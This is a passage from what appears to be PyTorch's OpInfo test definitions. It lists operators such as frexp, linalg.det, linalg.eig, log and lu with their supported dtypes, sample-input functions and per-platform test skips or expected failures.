DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.float16,)), )), UnaryUfuncInfo('frexp', op=torch.frexp, ref=np.frexp, dtypes=floating_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), # skip testing torch.frexp as it is not supported by ROCm platform yet decorators=[], supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # skips below tests as torch.frexp returns tuple-like (mantissa, exponent) as outputs, # while theses tests currently requires output to a single tensor. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_batch_vs_slicing'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_every_other'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_transposed'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_non_contig_expand'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), # skips test_reference_numerics due to error in Windows CI. # The np.frexp returns exponent as np.intc dtype on Windows platform, # and np.intc does not have the correspond torch dtype DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=IS_WINDOWS), )), BinaryUfuncInfo('ge', ref=np.greater_equal, aliases=('greater_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('geqrf', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], supports_autograd=False, skips=( # FIXME: geqrf can't forward with complex inputs that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), BinaryUfuncInfo('gt', ref=np.greater, aliases=('greater',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), UnaryUfuncInfo('imag', ref=np.imag, dtypes=complex_types_and(torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 # RuntimeError: view_as_real doesn't work on unresolved conjugated tensors. check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo('gradient', dtypes=floating_and_complex_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # following tests give a runtime error with undefined value tensor # see discussion : https://github.com/pytorch/pytorch/issues/56660 # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, torch.complex64)), # noqa: B950 DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_gradient, error_inputs_func=error_inputs_gradient), OpInfo('inverse', op=torch.inverse, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', '.test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', '.test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('isin', dtypes=all_types(), dtypesIfCUDA=all_types_and(torch.half), supports_autograd=False, sample_inputs_func=sample_inputs_isin), OpInfo('kthvalue', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kthvalue, error_inputs_func=error_inputs_kthvalue), BinaryUfuncInfo('le', ref=np.less_equal, aliases=('less_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.det', op=torch.linalg.det, aliases=('det',), dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False), OpInfo('linalg.det', op=torch.linalg.det, variant_test_name='singular', aliases=('det',), dtypes=double_types(), backward_dtypes=double_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det_singular, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False, skips=( # These tests started breaking after touching the SVD. DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cpu', dtypes=(torch.complex128,), active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # dtypes are tested in the suite above, no need to repeat it for singular DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), )), OpInfo('linalg.cholesky', aten_name='linalg_cholesky', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],), OpInfo('linalg.cholesky_ex', aten_name='linalg_cholesky_ex', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], ), OpInfo('linalg.cond', aten_name='linalg_cond', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cond, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],), OpInfo('linalg.eig', aten_name='linalg_eig', op=torch.linalg.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eig, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], ), OpInfo('linalg.eigvals', aten_name='linalg_eigvals', op=torch.linalg.eigvals, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), # exits early on eager extremal value test DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigh', aten_name='linalg_eigh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], skips=( # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigvalsh', aten_name='linalg_eigvalsh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.householder_product', aten_name='linalg_householder_product', op=torch.linalg.householder_product, aliases=('orgqr', ), dtypes=floating_and_complex_types(), # TODO: backward uses in-place operations that vmap doesn't like check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_householder_product, decorators=[ skipCUDAIfNoCusolver, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)})), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ]), OpInfo('linalg.ldl_factor', aten_name='linalg_ldl_factor', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_factor_ex', aten_name='linalg_ldl_factor_ex', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_solve', aten_name='linalg_ldl_solve', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_solve, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 4), "not available before CUDA 11.3.1"), skipCUDAIfNoCusolver, skipCUDAIfRocm, skipCPUIfNoLapack], ), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', dtypes=floating_and_complex_types(), supports_out=True, sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # we skip gradient checks for this suite as they are tested in # variant_test_name='grad_oriented' DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), # The values for attribute 'shape' do not match DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', variant_test_name='grad_oriented', # gradchecks for forward AD fails with multi-Tensor outputs op=lambda a, b, driver: torch.linalg.lstsq(a, b, driver=driver)[0], supports_out=False, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # tests do not work with passing lambda for op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=(not TEST_WITH_ROCM)), )), OpInfo('linalg.matrix_power', aliases=('matrix_power',), aten_name='linalg_matrix_power', dtypes=floating_and_complex_types(), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_power, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('linalg.multi_dot', # Need this lambda because gradcheck does not work with TensorList inputs aten_name='linalg_multi_dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_inplace_autograd=False, # Batched grad checks fail for empty input tensors (see https://github.com/pytorch/pytorch/issues/53407) check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_linalg_multi_dot, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples'), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), # NB: linalg.norm has two variants so that different skips can be used for different sample inputs OpInfo('linalg.norm', op=torch.linalg.norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_norm, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, aten_name='linalg_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('linalg.norm', op=torch.linalg.norm, variant_test_name='subgradients_at_zero', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=partial(sample_inputs_linalg_norm, variant='subgradient_at_zero'), aten_name='linalg_norm', supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # [NEW] Skips specifically for sample inputs at zero # norm's vjp/jvp are not well-conditioned near zero DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_fwgrad_bwgrad') )), OpInfo('linalg.matrix_norm', aten_name='linalg_matrix_norm', dtypes=floating_and_complex_types(), check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_norm), OpInfo('linalg.qr', aten_name='linalg_qr', op=torch.linalg.qr, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.slogdet', aten_name='linalg_slogdet', op=torch.linalg.slogdet, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_slogdet, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('linalg.vander', aten_name='linalg_vander', ref=np_vander_batched, op=torch.linalg.vander, dtypes=all_types_and_complex(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_linalg_vander), ReductionOpInfo( 'linalg.vector_norm', op=torch.linalg.vector_norm, identity=0, nan_policy='propagate', supports_multiple_dims=True, complex_to_real=True, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), generate_args_kwargs=sample_kwargs_vector_norm, aten_name='linalg_vector_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), )), UnaryUfuncInfo('log', ref=np.log, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log10', ref=np.log10, domain=(0, None), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), assert_autodiffed=True, dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log10(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log1p', ref=np.log1p, aliases=('special.log1p',), domain=(-1, None), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('log2', ref=np.log2, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), ), # log2(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), BinaryUfuncInfo('ldexp', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, promotes_int_to_float=True, supports_out=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: mul(): functions with out=... arguments don't support # automatic differentiation, but one of the arguments requires grad # https://github.com/pytorch/pytorch/issues/68966 DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ), decorators=[ DecorateInfo( toleranceOverride({ torch.complex64: tol(atol=1e-05, rtol=1e-05) }), 'TestCommon', device_type='cpu', ), ], ), OpInfo('logaddexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), OpInfo('logaddexp2', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=lambda op_info, device, dtype, requires_grad=False, **kwargs: (SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),)),)), UnaryUfuncInfo('logical_not', ref=np.logical_not, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 5e-1}),), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, skips=( # The function variant always returns BoolTensor # while the inplace variant preserves the input dtype. # >>> t = torch.randn(3) # >>> torch.logical_not(t) # tensor([False, False, False]) # >>> torch.logical_not(t).dtype # torch.bool # >>> t.logical_not_().dtype # torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16)), )), BinaryUfuncInfo('lt', ref=np.less, aliases=('less',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.lu_factor', aten_name='linalg_lu_factor', op=torch.linalg.lu_factor, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu_factor_ex', aten_name='linalg_lu_factor_ex', op=torch.linalg.lu_factor_ex, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.lu', aten_name='linalg_lu', op=torch.linalg.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('lu_unpack', op=torch.lu_unpack, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), sample_inputs_func=sample_inputs_lu_unpack), OpInfo('lu', op=torch.lu, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # we skip jit tests because `lu` is a torch function # RuntimeError: # 'Tensor (inferred)' object has no attribute or method 'lu'.: # File "<string>", line 3 # def the_method(i0): # return i0.lu(True, True) # ~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError not raised: Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), )), OpInfo('lu_solve', op=torch.lu_solve, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_lu_solve, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Tests different backward implementations"), "TestCommon", "test_floating_inputs_are_differentiable"),), ), OpInfo('masked_fill', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_masked_fill, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, supports_out=False), OpInfo('masked_scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_masked_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False), OpInfo('masked_select', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_masked_select, error_inputs_func=error_inputs_masked_select), OpInfo('matrix_exp', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), aliases=('linalg.matrix_exp',), sample_inputs_func=sample_inputs_matrix_exp, # Needs to construct a 2nx2n matrix by copy_ ing into it check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.expectedFailure, 